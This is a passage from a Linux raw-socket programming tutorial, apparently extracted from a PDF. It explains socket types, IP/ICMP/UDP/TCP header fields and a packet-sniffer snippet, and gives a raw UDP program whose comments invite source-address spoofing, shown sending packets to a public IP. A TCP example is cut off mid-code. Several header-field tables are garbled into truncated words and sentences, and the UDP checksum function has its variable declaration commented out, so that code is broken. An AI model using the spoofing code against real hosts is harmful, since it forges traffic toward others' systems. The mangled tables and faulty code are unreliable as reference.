Representation (XDR) protocol. Reflecting on the nature of this problem, you can easily see that the problem has nothing to do with the underlying network topology, wiring, or electrical interference. Application examples that use TCP: 1. TELNET: The Network Terminal Protocol provides remote login over the network. 2. FTP: The File Transfer Protocol is used for interactive file transfer between hosts. 3. SMTP: The Simple Mail Transfer Protocol acts as Mail Transfer Agent (MTA) that delivers electronic mail. Application examples that use UDP: 1. SNMP: The Simple Network Management Protocol is used to collect management information from network devices. 2. DNS : Domain Name Service, maps IP addresses to the names assigned to network devices. 3. RIP: Routing Information Protocol, routing is the central to the way TCP/IP networks. RIP is used by the network devices to exchange routing information. 4. NFS : Network File System, this protocol allows files to be shared by various hosts on the network as if they were local drives. RAW vs Cooked Socket Intro In this section and that follows, we will learn the basics of using raw sockets. Here, we will try to construct our own packet and insert any IP protocol based datagram into the network traffic. This is useful, for example, to build raw socket scanners like nmap, to spoof or to perform operations that need to send out raw sockets. Basically, you can send any packet at any time, whereas using the interface functions for your systems IP-stack (connect(), write(), bind(), etc.) as discussed in the previous Modules but you dont have direct control over the packets. This theoretically enables you to simulate the behavior of your OS's IP stack, and also to send stateless traffic (datagrams that don't belong to any valid connection). The usage of the raw socket is to send a single packet at one time, with all the protocol headers filled in by the program (instead of the kernel). As discussed in the previous Modules, when you create a socket and bind it to a process/port, you don't care about IP or TCP header fields as long as you are able to communicate with the server. The kernel or the underlying operating system builds the packet including the checksum for your data. Thus, network programming was so easy with the traditional cooked sockets. Contrarily, raw sockets let you fabricate the header fields including information like source IP address etc. The following is a socket() prototype. int socket(int domain, int type, int protocol); If you check the man page for socket(), the socket types defined for the type parameter includes:

e AM

Description Provides sequenced, reliable, two-way, connection-based byte streams. An out-of-band data transmissi

ACKET

ET

mechanism may be supported. Supports datagrams (connectionless, unreliable messages of a fixed maximum length). Provides a sequenced, reliable, two-way connection-based data transmission path for datagrams of fixed length; a consumer is required to read an entire packet with each read system call. Provides raw network protocol access. Provides a reliable datagram layer that does not guarantee ordering. Obsolete and should not be used in new programs. Use packet (check man page for packet) instead. Table 6: Socket types of socket(). There are two methods of receiving packets from the datalink layer under Linux. The original method, which is more widely available but less flexible and obsolete, is to create a socket of type SOCK_PACKET. The newer method, which introduces more filtering and performance features, is to create a socket of family PF_PACKET. To do either, we must have sufficient privileges (similar to creating a raw socket), and the third argument to socket must be a nonzero value specifying the Ethernet (may use other frame type such as Token Ring etc.) frame type. When using PF_PACKET sockets, the second argument to socket can be SOCK_DGRAM, for "cooked" packets with the linklayer header removed, or SOCK_RAW, for the complete link-layer packet. SOCK_PACKET sockets only return the complete link layer packet. For example, to receive all frames from the datalink, we may write: /* newer systems*/ fd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); Or /* older systems*/ fd = socket(AF_INET, SOCK_PACKET, htons(ETH_P_ALL)); This would return frames for all protocols that the datalink receives. If we want only IPv4 frames, the call would be: /* newer systems */ fd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_IP)); Or /* older systems */ fd = socket(AF_INET, SOCK_PACKET, htons(ETH_P_IP)); Other constants for the final argument are ETH_P_ARP and ETH_P_IPV6, for example. And for the domain parameter constants are listed below. In the previous Modules we just use the AF_INET. Name PF_UNIX, PF_LOCAL PF_INET PF_INET6 PF_IPX PF_NETLINK PF_X25 PF_AX25 Purpose Local communication. IPv4 Internet protocols. IPv6 Internet protocols. IPX - Novell protocols. Kernel user interface device. ITU-T X.25 / ISO-8208 protocol. Amateur radio AX.25 protocol.

PF_ATMPVC PF_APPLETALK PF_PACKET

Access to raw ATM PVCs. Appletalk. Low level packet interface. Table 7: Domain parameters of socket().

The protocol parameter specifies a particular protocol number/name string to be used with the socket. Normally only a single protocol exists to support a particular socket type within a given protocol family, in which a case protocol can be specified as 0 (as used in the program examples in previous Modules). However, it is possible that many protocols may exist, in which case a particular protocol must be specified in this manner. The protocol number to use is specific to the communication domain. Partial list of the protocol number have been discussed in IPv4 Datagram Format section (or you can check man getprotobyname() page or RFC1700 for a complete list). To map protocol name strings to protocol numbers you may use getprotoent() function. In the previous Modules we have already made familiar with SOCK_STREAM and SOCK_DGRAM. In this section, we'll be usingSOCK_RAW, which includes the IP headers (and all subsequent protocol headers of the upper layer as needed) and data. In the previous program examples also we used SOCK_STREAM (TCP/connection oriented) and SOCK_DGRAM (UDP/connectionless) sockets as shown below: socket(AF_INET, SOCK_STREAM, 0); And socket(AF_INET, SOCK_DGRAM, 0); For raw socket we code as follows: #include <sys/socket.h> #include <netinet/in.h> socket(PF_INET, SOCK_RAW, IPPROTO_UDP); socket(PF_INET, SOCK_RAW, IPPROTO_TCP); socket(PF_INET, SOCK_RAW, IPPROTO_ICMP); Depending on what you want to send, you initially open a socket and give it its type. For example: sockd = socket(AF_INET, SOCK_RAW, <protocol>); For the <protocol>, you can choose from any protocol (number or string) including IPPROTO_RAW. The protocol number goes into the IP header verbatim. IPPROTO_RAW places 0 in the IP header. A socket option IP_HDRINCL allows you to include your own IP header along with the rest of the packet. Then, you might use it as: char on = 1; setsockopt(sockd, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)); You then build the packet and use a normal sendto(), recvfrom() etc. The Internet IPv4 layer generates an IP header when sending a packet unless the IP_HDRINCL socket option is enabled on the socket. When it is enabled, the packet must contain an IP header that you should include in your program. Only

processes with an effective user id of 0 (root) or the CAP_NET_RAW capability are allowed to open raw sockets. A protocol of IPPROTO_RAW implies theIP_HDRINCL is enabled. For this case, the following is a summary for the IP header. IP Header fields modified on sending by IP_HDRINCL IP Checksum Always filled in. Source Address Filled in when zero. Packet Id Filled in when zero. Total Length Always filled in. Table 8: Some IP header default values. If IP_HDRINCL is specified and the IP header has a non-zero destination address then the destination address of the socket is used to route the packet. When MSG_DONTROUTE is specified the destination address should refer to a local interface, otherwise a routing table lookup is done anyways but gatewayed routes are ignored. If IP_HDRINCL isn't set then IP header options can be set on raw sockets with setsockopt() as shown before. Raw sockets are usually only needed for new protocols or protocols with no user interface (like ICMP). When a packet is received, it is passed to any raw sockets which have been bound to its protocol before it is passed to other protocol handlers (e.g. kernel protocol modules). Raw sockets use the standard sockaddr_in address structure defined in ip.h. For example: ... struct sockaddr_in sin; ... // Address family sin.sin_family = AF_INET; // Port numbers sin.sin_port = srcportnum; // IP addresses sin.sin_addr.s_addr = inet_addr(argv[1]); Raw socket options can be set with setsockopt() and read with getsockopt() by passing the SOL_RAW family flag. Raw sockets fragment a packet when its total length exceeds the interface Maximum Transfer Unit (MTU). A raw socket can be bound to a specific local address using the bind() call. If it isn't bound, all packets with the specified IP protocol are received. In addition a RAW socket can be bound to a specific network device using SO_BINDTODEVICE (check the socket() man page). An IPPROTO_RAW socket is send only. If you really want to receive all IP packets use a packet() socket with the ETH_P_IP protocol. Note that packet sockets don't reassemble IP fragments, unlike raw sockets. If you want to receive all ICMP packets for a datagram socket it is often better to use IP_RECVERR on that particular socket.

Raw sockets may tap all IP protocols in Linux for example, even protocols like ICMP or TCP which have a protocol module in the kernel. In this case the packets are passed to both the kernel module and the raw socket(s). Maximum Transfer Unit (MTU) The Maximum Transfer Unit (MTU) specifies the maximum transmission unit size of an interface. Each interface used by TCP/IP may have a different MTU value specified. The MTU is usually determined through negotiation with the lower-level driver and by using that lower-level driver value. However, that value may be overridden. Each media type (used in Ethernet, FDDI, Token Ring etc) has a maximum frame size that cannot be exceeded. The link layer is responsible for discovering this MTU and reporting it to the protocols above the link layer. Network Driver Interface Specification (NDIS) drivers may be queried for the local MTU by the protocol stack. Knowledge of the MTU for an interface is used by upper-layer protocols, such as TCP, which automatically optimizes packet sizes for each medium. From the moment the raw socket is created, you can send any IP packets over it, and receive any IP packets that the host received after that socket was created if you read() from it. Note that even though the socket is an interface to the IP header, it is transport layer specific. That means, for listening to TCP, UDP and ICMP traffic, you have to create 3 separate raw sockets, using IPPROTO_TCP,IPPROTO_UDP and IPPROTO_ICMP (the protocol numbers are 6 for tcp, 17 for udp and 1 for ICMP). With this knowledge, we can, for example, create a small sniffer program as shown in the following code portion that dumps out the contents of all tcp packets we receive and print out the payload, the data of the session/application layer etc. int fd = socket(PF_INET, SOCK_RAW, IPPROTO_TCP); /* single packets are usually not bigger than 8192 bytes but depend on the media standard of the Network Access layer such as Ethernet, Token Ring etc */ ... char buffer[8192]; struct ipheader *ip = (struct ipheader *) buffer; struct udpheader *udp = (struct udpheader *) (buffer + sizeof(struct ipheader)); ... while (read(fd, buffer, 8192) > 0) /* packet = data + ip header + tcp header */ /* Little Endian/Big Endian must be considered here */ printf("Dump the packet: %s\n", buffer + sizeof(struct ipheader) + sizeof(struct tcpheader));

LINUX SOCKET PART 16 Advanced TCP/IP -The TCP/IP Protocols Details


This is a continuation from Part IV series, Advanced TCP/IP Programming Tutorial. Working program examples if any compiled using gcc, tested using the public IPs, run on Fedora Core 3, with several times of update, as root or SUID 0. The Fedora machine used for the testing having the "No Stack Execute" disabled and the SELinux set to default configuration. This Module will concentrate on the TCP/IP stack and will try to dig deeper till the packet level. The protocols: IP, ICMP, UDP and TCP To fabricate our own packets, what we all need to know is the structures of the protocols that need to be included. We can define our own protocol structure (packets header) then assign it with new values or we just assign new values for the standard built-in structures elements. Below you will find detail information of the IP, ICMP, UDP and TCP headers. Unix/Linux systems provide standard structures for the header files, so it is very useful in learning and understanding packets by fabricating our own packet by using a struct, so we have the flexibility in filling the packet headers. We can always create our own struct, as long as the length of each field is correct. In building our program later on, note also the little endian (Intel x86) notation and the big endian based machines (some processor architectures other than Intel x86 such as Motorola). The following sections try to analyze header structures that will be used to construct our own packet in the program examples that follows, so that we know what values should be filled in and which meaning they have. The data types that we need to use are: unsigned char (1 byte/8 bits), unsigned short int (2 bytes/16 bits) and unsigned int (4 bytes/32 bits). Some of the information presented in the following sections might be a repetition from the previous one. IP The following figure is IP header format that will be used as our reference in the following discussion.

Figure 23: IP header format. The following is a structure for IP header example. Here we try defining all the IP header fields. struct ipheader { unsigned char iph_ihl:4, ip_ver:4; unsigned char iph_tos; unsigned short int iph_len; unsigned short int iph_ident; unsigned char iph_flags; unsigned short int iph_offset; unsigned char iph_ttl; unsigned char iph_protocol; unsigned short int iph_chksum; unsigned int iph_source; unsigned int iph_dest; }; The Internet Protocol is the network layer protocol, used for routing the data from the source to its destination. Every datagram contains an IP header followed by a transport layer protocol such as tcp or udp. The following Table is a list of the IP header fields and their information.

Description 4 bits of the version of IP currently used, the ip version is 4 (other version is IPv6). 4 bits, the ip header (datagram) length in 32 bits octets (bytes) that point to the beginning of the data. The minim a correct header is 5. This means a value of 5 for the iph_ihl means 20 bytes (5 * 4). Values other than 5 only ne if the ip header contains options (mostly used for routing). 8 bits, type of service controls the priority of the packet. 0x00 is normal; the first 3 bits stand for routing priority, th for the type of service (delay, throughput, reliability and cost). It indicates the quality of service desired by specifying how an upper-layer protocol would like a current datagram handled, and assigns datagrams various levels of importance. This field is used for the assignment of Precedenc Throughput and Reliability. These parameters are to be used to guide the selection of the actual service parame transmitting a datagram through a particular network. Several networks offer service precedence, which someho precedence traffic as more important than other traffic (generally by accepting only traffic above certain preceden high load). The major choice is a three way tradeoff between low-delay, high-reliability, and high-throughput. Bits 0-2: Precedence. 111 - Network Control 110 - Internetwork Control 101 - CRITIC/ECP 100 - Flash Override 011 - Flash 010 - Immediate 001 - Priority 000 Routine

Bit 3: 0 = Normal Delay, 1 = Low Delay. Bits 4: 0 = Normal Throughput, 1 = High Throughput. Bits 5: 0 = Normal Reliability, 1 = High Reliability. Bit 6-7: Reserved for Future Use. 0 1 2 Precedence 3 D 4 T 5 R 6 0 7 0

The use of the Delay, Throughput, and Reliability indications may increase the cost (in some sense) of the service networks better performance for one of these parameters is coupled with worse performance on another. Except unusual cases at most two of these three indications should be set. The type of service is used to specify the treatment of the datagram during its transmission through the internet s The Network Control precedence designation is intended to be used within a network only. The actual use and c designation is up to each network. The Internetwork Control designation is intended for use by gateway control o only. If the actual use of these precedence designations is of concern to a particular network, it is the responsibil network to control the access to, and use of, those precedence designations. The total is 16 bits; total length must contain the total length of the ip datagram (ip and data) in bytes. This includ header, icmp or tcp or udp header and payload size in bytes. The maximum length could be specified by this field is 65,535 bytes. Typically, hosts are prepared to accept data 576 bytes (whether they arrive whole or in fragments). The iph_ident sequence number is mainly used for reassembly of fragmented IP datagrams. When sending single each can have an arbitrary ID. It contains an integer that identifies the current datagram. This field is assigned b help receiver to assemble the datagram fragments. Consists of a 3-bit field of which the two low-order (least-significant) bits control fragmentation. The low-order bit whether the packet can be fragmented. The middle bit specifies whether the packet is the last fragment in a serie fragmented packets. The third or high-order bit is not used. The Control Flags: Bit 0: reserved, must be zero. Bit 1: (DF) 0 = May Fragment, 1 = Don't Fragment. Bit 2: (MF) 0 = Last Fragment, 1 = More Fragments. 0 1 2 0 DF MF

The fragment offset is used for reassembly of fragmented datagrams. The first 3 bits are the fragment flags, the always 0, the second the do-not-fragment bit (set by ihp_offset = 0x4000) and the third the more-flag or more-frag following bit (ihp_offset = 0x2000). The following 13 bits is the fragment offset, containing the number of 8-byte b already sent. This 13 bits field indicates the position of the fragment's data relative to the beginning of the data in the original da which allows the destination IP process to properly reconstruct the original datagram. 8 bits, time to live is the number of hops (routers to pass) before the packet is discarded, and an icmp error mess returned. The maximum is 255. It is a counter that gradually decrements down to zero, at which point the datagr discarded. This keeps packets from looping endlessly. 8 bits, the transport layer protocol. It can be tcp (6), udp (17), icmp (1), or whatever protocol follows the ip heade in/etc/protocols or RFC 1700 for more. It indicates which upper-layer protocol receives incoming packets after IP is complete.

16 bits, a checksum on the header only, the ip datagram. Every time anything in the datagram changes, it needs recalculated, or the packet will be discarded by the next router. It helps ensure IP header integrity. Since some h change, e.g., Time To Live, this is recomputed and verified at each point that the Internet header is processed. 32 bits, source IP address. It is converted to long format, e.g. by inet_addr(). Can be chosen arbitrarily (as used spoofing). 32 bits, destination IP address, converted to long format, e.g. by inet_addr(). Can be chosen arbitrarily. Variable. The options may appear or not in datagrams. They must be implemented by all IP modules (host and g What is optional is their transmission in any particular datagram, not their implementation. In some environments option may be required in all datagrams. The option field is variable in length. There may be zero or more option Variable. The internet header padding is used to ensure that the internet header ends on a 32 bit boundary. The zero. Table 9: IP header fields description. Fragmentation Fragmentation, transmission and reassembly across a local network which is invisible to the internet protocol (IP) are called intranet fragmentation. Fragmentation of an internet datagram is necessary when it originates in a local network that allows a large packet size and must traverse a local network that limits packets to a smaller size to reach its destination. An internet datagram can be marked "don't fragment". When the internet datagram is marked like that, it is not to be internet fragmented under any circumstances. If internet datagram that has been marked as "don't fragment" cannot be delivered to its destination without fragmenting it, it will be discarded instead. The internet fragmentation and reassembly procedure needs to be able to break a datagram into an almost arbitrary number of pieces that can be later reassembled. The receiver of the fragments uses the identification field to ensure that fragments of different datagrams are not mixed. The fragment offset field tells the receiver the position of a fragment in the original datagram. The fragment offset and lengthdetermine the portion of the original datagram covered by this fragment. The more-fragments flag indicates (by being reset) the last fragment. These fields provide sufficient information to reassemble datagrams. The identification field is used to distinguish the fragments of one datagram from another. The originating protocol module of an internet datagram sets the identification field to a value that must be unique for that source-destination pair and protocol for the time the datagram will be active in the internet system. The originating protocol module of a complete datagram sets the more-fragments flag to zero and the fragment offset to zero. To fragment a long internet datagram, an internet protocol module (for example, in a gateway/router), creates two new internet datagrams and copies the contents of the internet header fields from the long datagram into both new internet headers. The data of the long datagram is divided into two portions on an 8 bytes (64 bit) boundary (the second portion might not be an integral multiple of 8 bytes, but the first must be). The number of 8 byte blocks in the first portion is called NFB (for Number of Fragment Blocks). The first portion of the data is placed in the first new internet datagram, and the total length field is set to the length of the first datagram. Themore-fragments flag is

set to one. The second portion of the data is placed in the second new internet datagram, and the total lengthfield is set to the length of the second datagram. The more-fragments flag carries the same value as the long datagram. The fragment offset field of the second new internet datagram is set to the value of that field in the long datagram plus NFB. This procedure can be generalized for an n-way split, rather than the two-way split described. To assemble the fragments of an internet datagram, an internet protocol module (for example at a destination host) combines internet datagrams that all have the same valuefor the four fields: identification, source, destination, and protocol. The combination is done by placing the data portion of each fragment in the relative position indicated by the fragment offset in that fragment's internet header. The first fragment will have thefragment offset zero, and the last fragment will have the morefragments flag reset to zero. ICMP IP itself has no mechanism for establishing and maintaining a connection, or even containing data as a direct payload. Internet Control Messaging Protocol is merely an addition to IP to carry error, routing and control messages and data, and is often considered as a protocol of the network layer. The following is ICMP header format.

Figure 24: ICMP header format. The following example is a structure that tries to define the ICMP header. This structure defined for Echo or Echo Reply Message. struct icmpheader { unsigned char icmph_type; unsigned char icmph_code; unsigned short int icmph_chksum; /* The following data structures are ICMP type specific */ unsigned short int icmph_ident; unsigned short int icmph_seqnum; }; /* total ICMP header length: 8 bytes (= 64 bits) */ Messages can be error or informational messages. Error messages can be Destination unreachable, Packet too big, Time exceed, Parameter problem. The possible informational messages are, Echo Request, Echo Reply, Group Membership Query, Group Membership Report and Group Membership Reduction. The following Table lists all the information for the previous structure element (the ICMP headers fields).

Description The message type, for example 0 - echo reply, 8 - echo request, 3 - destination unreachable. Look in for all the t each type of message several different codes are defined. An example of this is the Destination Unreachable m

possible messages are: no route to destination, communication with destination administratively prohibited, not a address unreachable, port unreachable. For further details, refer to the standard. This is significant when sending an error message (unreach), and specifies the kind of error. Again, consult the i more. The 16-bit one's complement of the one's complement sum of the ICMP message starting with the ICMP computing the checksum, the checksum field should be zero. The checksum for the ICMP header + data. Same as the IP checksum. Note: The next 32 bits in an ICMP pack used in many different ways. This depends on the ICMP type and code. The most commonly seen structure, an sequence number, is used in echo requests and replies, but keep in mind that the header is actually more compl An identifier to aid in matching requests/replies; may be zero. Used to echo request/reply messages, to identify Sequence number to aid in matching requests/replies; may be zero. Used to identify the sequence of echo mes than one is sent. Table 10: ICMP header fields description. The following is an example of the ICMP header format as defined in the above structure for Echo or Echo Reply Message.

Figure 25: An example of IP header format for Echo or Echo Reply Message. The description: Description

8 - For echo message; 0 - for echo reply message. 0. The checksum is the 16-bit ones complement of the one's complement sum of the ICMP message starting with Type. For computing the checksum, the checksum field should be zero. If the total length is odd, the received padded with one octet of zeros for computing the checksum. This checksum may be replaced in the future. If code = 0, an identifier to aid in matching echoes and replies, may be zero. If code = 0, a sequence number to aid in matching echoes and replies, may be zero. The data received in the e must be returned in the echo reply message. The identifier and sequence number may be used by the echo se matching the replies with the echo requests. For example, the identifier might be used like a port in TCP or UD session, and the sequence number might be incremented on each echo request sent. The echoer returns thes in the echo reply. Code 0 may be received from a gateway or a host. Table 11: IP header fields for Echo or Echo Reply Message description.

UDP The User Datagram Protocol is a transport protocol for sessions that need to exchange data. Both transport protocols, UDP and TCP provide 65535 (2 16) different standard and non standard source and destination ports. The destination port is used to connect to a specific service on that port. Unlike TCP, UDP is not reliable, since it doesn't use sequence numbers and stateful connections. This means UDP datagrams can be spoofed, and might not be reliable (e.g. they can be lost unnoticed), since they are not acknowledged using replies and sequence numbers. The following figure shows the UDP header format.

Figure 26: UDP header format. As an example, we can define a structure for the UDP header as follows. struct udpheader { unsigned short int udph_srcport; unsigned short int udph_destport; unsigned short int udph_len; unsigned short int udph_chksum; }; /* total udp header length: 8 bytes (= 64 bits) */ A brief description:

Description The source port that a client binds to, and the contacted server will reply back to in order to direct his responses to an optional field, when meaningful, it indicates the port of the sending process, and may be assumed to be the port reply should be addressed in the absence of any other information. If not used, a value of zero is inserted. The destination port that a specific server can be contacted on. The length of udp header and payload data in bytes. It is a length in bytes of this user datagram including this head data. (This means the minimum value of the length is eight.) The checksum of header and data, see IP checksum. It is the 16-bit one's complement of the one's complement su a pseudo header (shown in the following figure) of information from the IP header, the UDP header, and the data,

zero octets at the end (if necessary) to make a multiple of two octets. The pseudo header conceptually prefixed to the UDP header contains the source address, the destination address and the UDP length. This information gives protection against misrouted datagrams. This checksum procedure is used in TCP. If the computed checksum is zero, it is transmitted as all ones (the equivalent in one's complement arithmetic). An transmitted checksum value means that the transmitter generated no checksum (for debugging or for higher level p don't care). Table 12: UDP header fields description.

Figure 27: UDP pseudo header format. TCP The Transmission Control Protocol is the mostly used transport protocol that provides mechanisms to establish a reliable connection with some basic authentication, using connection states and sequence numbers. The following is a TCP header format.

Figure 28: TCP header format. And a structure example for the TCP headers field. struct tcpheader { unsigned short int tcph_srcport; unsigned short int tcph_destport; unsigned int tcph_seqnum; unsigned int tcph_acknum; unsigned char tcph_reserved:4, tcph_offset:4; unsigned char tcph_flags; unsigned short int tcph_win; unsigned short int tcph_chksum; unsigned short int tcph_urgptr; };

/* total tcp header length: 20 bytes (= 160 bits) */ A brief description:

Description The 16 bits source port, which has the same function as in UDP. The 16 bits destination port, which has the same function as in UDP. The 32 bits sequence number of the first data octet in this segment (except when SYN is present). If SYN is prese sequence number is the initial sequence number (ISN) and the first data octet is ISN+1. It is used to enumerate the TCP segments. The data in a TCP connection can be contained in any amount of segm tcp datagrams), which will be put in order and acknowledged. For example, if you send 3 segments, each containin data, the first sequence would be (N+)1, the second one (N+)33 and the third one (N+)65. "N+" because the initial random. 32 bits. If the ACK control bit is set this field contains the value of the next sequence number the sender of the seg expecting to receive. Once a connection is established this is always sent. Every packet that is sent and a valid pa connection is acknowledged with an empty TCP segment with the ACK flag set (see below), and the tcph_acknum containing the previous tcph_seqnum number. The segment offset specifies the length of the TCP header in 32bit/4byte blocks. Without tcp header options, the v 4 bits reserved for future use. This is unused and must contain binary zeroes. This field consists of six bits flags (left to right). They can be ORed. TH_URG - Urgent. Segment will be routed faster, used for termination of a connection or to stop processes (using protocol). TH_ACK - Acknowledgement. Used to acknowledge data and in the second and third stage of a TCP connection i TH_PSH - Push. The systems IP stack will not buffer the segment and forward it to the application immediately (m with telnet). TH_RST - Reset. Tells the peer that the connection has been terminated. TH_SYN - Synchronization. A segment with the SYN flag set indicates that client wants to initiate a new connectio destination port. TH_FIN - Final. The connection should be closed, the peer is supposed to answer with one last segment with the F well. 16 bits Window. The number of bytes that can be sent before the data should be acknowledged with an ACK befo more segments. The checksum field is the 16 bit one's complement of the one's complement sum of all 16 bit words in the header a segment contains an odd number of header and text octets to be checksummed, the last octet is padded on the rig to form a 16 bit word for checksum purposes. The pad is not transmitted as part of the segment. While computing checksum, the checksum field itself is replaced with zeros. It is the checksum of pseudo header, tcp header and p pseudo is a structure containing IP source and destination address, 1 byte set to zero, the protocol (1 byte with a d of 6), and 2 bytes (unsigned short) containing the total length of the tcp segment. The checksum also covers a 96 bit pseudo header (shown in the following figure) conceptually prefixed to the TCP pseudo header contains the Source Address, the Destination Address, the Protocol, and TCP length. This gives th protection against misrouted segments. This information is carried in the Internet Protocol and is transferred acros TCP/Network interface in the arguments or results of calls by the TCP on the IP. Urgent pointer. Only used if the TH_URG flag is set, else zero. It points to the end of the payload data that should priority. Table 13: TCP header fields description.

Figure 29: TCP pseudo header format. The TCP Length is the TCP header length plus the data length in octets (this is not an explicitly transmitted quantity, but is computed), and it does not count the 12 octets of the pseudo header.

LINUX SOCKET PART 17 Advanced TCP/IP - THE RAW SOCKET PROGRAM EXAMPLES
This is a continuation from Part IV series, Advanced TCP/IP Programming Tutorial. Working program examples if any compiled using gcc, tested using the public IPs, run on Fedora Core 3, with several times of update, as root or SUID 0. The Fedora machine used for the testing having the "No Stack Execute" disabled and the SELinux set to default configuration. Building and injecting RAW datagrams program examples [root@bakawali testraw]# cat rawudp.c // ----rawudp.c-----// Must be run by root lol! Just datagram, no payload/data #include <unistd.h> #include <stdio.h> #include <sys/socket.h> #include <netinet/ip.h> #include <netinet/udp.h> // The packet length #define PCKT_LEN 8192 // Can create separate header file (.h) for all headers' structure // The IP header's structure struct ipheader { unsigned char iph_ihl:5, iph_ver:4; unsigned char iph_tos; unsigned short int iph_len; unsigned short int iph_ident; unsigned char iph_flag; unsigned short int iph_offset; unsigned char iph_ttl; unsigned char iph_protocol;

unsigned short int iph_chksum; unsigned int iph_sourceip; unsigned int iph_destip; }; // UDP header's structure struct udpheader { unsigned short int udph_srcport; unsigned short int udph_destport; unsigned short int udph_len; unsigned short int udph_chksum; }; // total udp header length: 8 bytes (=64 bits) // Function for checksum calculation. From the RFC, // the checksum algorithm is: // "The checksum field is the 16 bit one's complement of the one's // complement sum of all 16 bit words in the header. For purposes of // computing the checksum, the value of the checksum field is zero." unsigned short csum(unsigned short *buf, int nwords) { // unsigned long sum; for(sum=0; nwords>0; nwords--) sum += *buf++; sum = (sum >> 16) + (sum &0xffff); sum += (sum >> 16); return (unsigned short)(~sum); } // Source IP, source port, target IP, target port from the command line arguments int main(int argc, char *argv[]) { int sd; // No data/payload just datagram char buffer[PCKT_LEN]; // Our own headers' structures struct ipheader *ip = (struct ipheader *) buffer; struct udpheader *udp = (struct udpheader *) (buffer + sizeof(struct ipheader)); // Source and destination addresses: IP and port struct sockaddr_in sin, din; int one = 1; const int *val = &one;

memset(buffer, 0, PCKT_LEN); if(argc != 5) { printf("- Invalid parameters!!!\n"); printf("- Usage %s <source hostname/IP> <source port> <target hostname/IP> <target port>\n", argv[0]); exit(-1); } // Create a raw socket with UDP protocol sd = socket(PF_INET, SOCK_RAW, IPPROTO_UDP); if(sd < 0) { perror("socket() error"); // If something wrong just exit exit(-1); } else printf("socket() - Using SOCK_RAW socket and UDP protocol is OK.\n"); // The source is redundant, may be used later if needed // The address family sin.sin_family = AF_INET; din.sin_family = AF_INET; // Port numbers sin.sin_port = htons(atoi(argv[2])); din.sin_port = htons(atoi(argv[4])); // IP addresses sin.sin_addr.s_addr = inet_addr(argv[1]); din.sin_addr.s_addr = inet_addr(argv[3]); // Fabricate the IP header or we can use the // standard header structures but assign our own values. ip->iph_ihl = 5; ip->iph_ver = 4; ip->iph_tos = 16; // Low delay ip->iph_len = sizeof(struct ipheader) + sizeof(struct udpheader); ip->iph_ident = htons(54321); ip->iph_ttl = 64; // hops ip->iph_protocol = 17; // UDP // Source IP address, can use spoofed address here!!! ip->iph_sourceip = inet_addr(argv[1]); // The destination IP address ip->iph_destip = inet_addr(argv[3]);

// Fabricate the UDP header. Source port number, redundant udp->udph_srcport = htons(atoi(argv[2])); // Destination port number udp->udph_destport = htons(atoi(argv[4])); udp->udph_len = htons(sizeof(struct udpheader)); // Calculate the checksum for integrity ip->iph_chksum = csum((unsigned short *)buffer, sizeof(struct ipheader) + sizeof(struct udpheader)); // Inform the kernel do not fill up the packet structure. we will build our own... if(setsockopt(sd, IPPROTO_IP, IP_HDRINCL, val, sizeof(one)) < 0) { perror("setsockopt() error"); exit(-1); } else printf("setsockopt() is OK.\n"); // Send loop, send for every 2 second for 100 count printf("Trying...\n"); printf("Using raw socket and UDP protocol\n"); printf("Using Source IP: %s port: %u, Target IP: %s port: %u.\n", argv[1], atoi(argv[2]), argv[3], atoi(argv[4])); int count; for(count = 1; count <=20; count++) { if(sendto(sd, buffer, ip->iph_len, 0, (struct sockaddr *)&sin, sizeof(sin)) < 0) // Verify { perror("sendto() error"); exit(-1); } else { printf("Count #%u - sendto() is OK.\n", count); sleep(2); } } close(sd); return 0; } [root@bakawali testraw]# gcc rawudp.c -o rawudp [root@bakawali testraw]# ./rawudp - Invalid parameters!!!

- Usage ./rawudp <source hostname/IP> <source port> <target hostname/IP> <target port> [root@bakawali testraw]# ./rawudp 192.168.10.10 21 203.106.93.91 8080 socket() - Using SOCK_RAW socket and UDP protocol is OK. setsockopt() is OK. Trying... Using raw socket and UDP protocol Using Source IP: 192.168.10.10 port: 21, Target IP: 203.106.93.91 port: 8080. Count #1 - sendto() is OK. Count #2 - sendto() is OK. Count #3 - sendto() is OK. Count #4 - sendto() is OK. Count #5 - sendto() is OK. Count #6 - sendto() is OK. Count #7 - sendto() is OK. ... You can use network monitoring tools to capture the raw socket datagrams at the target machine to see the effect. The following is a raw socket and tcp program example. [root@bakawali testraw]# cat rawtcp.c //---cat rawtcp.c--// Run as root or SUID 0, just datagram no data/payload #include <unistd.h> #include <stdio.h> #include <sys/socket.h> #include <netinet/ip.h> #include <netinet/tcp.h> // Packet length #define PCKT_LEN 8192 // May create separate header file (.h) for all // headers' structures // IP header's structure struct ipheader { unsigned char iph_ihl:5, /* Little-endian */ iph_ver:4; unsigned char iph_tos; unsigned short int iph_len; unsigned short int iph_ident; unsigned char iph_flags; unsigned short int iph_offset; unsigned char iph_ttl; unsigned char iph_protocol; unsigned short int iph_chksum; unsigned int iph_sourceip; unsigned int iph_destip;

}; /* Structure of a TCP header */ struct tcpheader { unsigned short int tcph_srcport; unsigned short int tcph_destport; unsigned int tcph_seqnum; unsigned int tcph_acknum; unsigned char tcph_reserved:4, tcph_offset:4; // unsigned char tcph_flags; unsigned int tcp_res1:4, /*little-endian*/ tcph_hlen:4, /*length of tcp header in 32-bit words*/ tcph_fin:1, /*Finish flag "fin"*/ tcph_syn:1, /*Synchronize sequence numbers to start a connection*/ tcph_rst:1, /*Reset flag */ tcph_psh:1, /*Push, sends data to the application*/ tcph_ack:1, /*acknowledge*/ tcph_urg:1, /*urgent pointer*/ tcph_res2:2; unsigned short int tcph_win; unsigned short int tcph_chksum; unsigned short int tcph_urgptr; }; // Simple checksum function, may use others such as Cyclic Redundancy Check, CRC unsigned short csum(unsigned short *buf, int len) { unsigned long sum; for(sum=0; len>0; len--) sum += *buf++; sum = (sum >> 16) + (sum &0xffff); sum += (sum >> 16); return (unsigned short)(~sum); } int main(int argc, char *argv[]) { int sd; // No data, just datagram char buffer[PCKT_LEN]; // The size of the headers struct ipheader *ip = (struct ipheader *) buffer; struct tcpheader *tcp = (struct tcpheader *) (buffer + sizeof(struct ipheader));

